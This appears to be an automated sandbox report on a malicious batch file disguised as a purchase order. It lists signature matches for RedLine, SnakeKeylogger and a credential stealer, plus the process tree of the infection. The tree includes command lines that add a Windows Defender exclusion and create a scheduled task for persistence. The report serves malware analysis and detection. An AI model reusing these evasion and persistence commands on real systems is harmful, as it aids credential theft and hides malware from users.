                            Source: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000012.00000002.2270156460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000017.00000001.2249245726.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000017.00000002.2359070635.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: Microsofts.exe.7.dr, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                            Source: Microsofts.exe.7.dr, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                            Source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                            Source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                            Source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                            Source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                            Source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                            Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@39/18@5/3
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027C7F5C GetDiskFreeSpaceA,4_2_027C7F5C
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,7_2_004019F0
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D6D50 CoCreateInstance,4_2_027D6D50
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,7_2_004019F0
                            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\OupzhkprF.cmdJump to behavior
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3716:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2284:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
                            Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\CAB04404.TMPJump to behavior
                            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_Tower_049.bat" "
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A7_2_00413780
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A7_2_00413780
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A7_1_00413780
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A18_2_00413780
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A18_2_00413780
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A18_1_00413780
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A23_2_00413780
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A23_2_00413780
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A23_1_00413780
                            Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002F7D000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3289291255.0000000003E8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: PO#5_Tower_049.batReversingLabs: Detection: 44%
                            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_Tower_049.bat" "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO#5_Tower_049.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                            Source: unknownProcess created: C:\Users\Public\Libraries\Oupzhkpr.PIF "C:\Users\Public\Libraries\Oupzhkpr.PIF"
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO#5_Tower_049.bat" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pifJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /fJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" Jump to behavior
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: smartscreenps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieproxy.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mssip32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttpcom.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: webio.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??????????.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ???.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??l.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ?.dllJump to behavior
